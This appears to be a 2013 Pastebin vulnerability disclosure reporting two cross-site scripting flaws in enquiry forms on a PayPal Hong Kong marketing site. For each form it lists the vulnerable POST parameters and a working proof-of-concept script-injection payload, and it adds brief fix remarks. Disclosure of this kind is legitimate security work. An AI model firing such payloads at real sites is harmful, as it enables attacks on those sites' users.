Advertisement
BreakTheSec

Paypal xss vulnerability

Feb 16th, 2013
1,430
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.82 KB | None | 0 0
  1. Number of Vulnerabilities : 2
  2. ___________________________________________________________________________________________
  3. --- Vulnerability # No- 1:
  4. ___________________________________________________________________________________________
  5. +URL: https://www.paypal-marketing.com.hk/merchant-enquiries/index.php
  6. +Vulnerability Type: Cross Site Scripting (XSS)
  7. + Form Action : POST
  8. +POST Data Sent to Produce the Bug :
  9.  
  10. token=1359557986&from_page=en&company_name=%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E&business_type_other=vulnerable_field&business_need_other=vulnerable_field&contact_person=vulnerable_field&contact_person2=vulnerable_field&phone=vulnerable_field&phone2=vulnerable_field&email=vulnerable_field&email2=vulnerable_field&business_type=1
  11.  
  12. --Here, the field name with field value vulnerable_field are all vulnerable to cross site scripting .
  13.  
  14. And, the filed name (company_name) with value %22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E is also vulnerable and used here to produce the XSS bug here .
  15. +POST Parameters that cause XSS Vulnerability in this Page :
  16. company_name , business_type_other,business_need_other, contact_person ,contact_person2, phone,phone2, email,email2
  17.  
  18. +How to fix :
  19. -- Though this page uses a java script function to validate this form, but it fails to sanitize the all characters which could allow hackers or pen testers to return malicious on webpage like Cross Site Scripting attack
  20.  
  21. ___________________________________________________________________________________________
  22. Vulnerability No. # 2 :
  23. ___________________________________________________________________________________________
  24. +URL: https://www.paypal-marketing.com.hk/merchant-enquiries/index-zh.php
  25. +Vulnerability Type: Cross Site Scripting (XSS)
  26. + Form Action : POST
  27. +POST Data Sent to Produce the Bug :
  28.  
  29. token=1359557986&from_page=en&company_name=%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E&business_type_other=vulnerable_field&business_need_other=vulnerable_field&contact_person=vulnerable_field&contact_person2=vulnerable_field&phone=vulnerable_field&phone2=vulnerable_field&email=vulnerable_field&email2=vulnerable_field&business_type=1
  30.  
  31. --Here, the field name with field value vulnerable_field are all vulnerable to cross site scripting .
  32.  
  33. And, the filed name (company_name) with value %22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E is also vulnerable and used here to produce the XSS bug here .
  34. +POST Parameters that cause XSS Vulnerability in this Page :
  35. company_name , business_type_other,business_need_other, contact_person ,contact_person2, phone,phone2, email,email2
  36.  
  37. +How to fix :
  38. -- Though this page uses a java script function to validate this form, but it fails to sanitize the all characters which could allow hackers or pen testers to return malicious on webpage like Cross Site Scripting attack
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement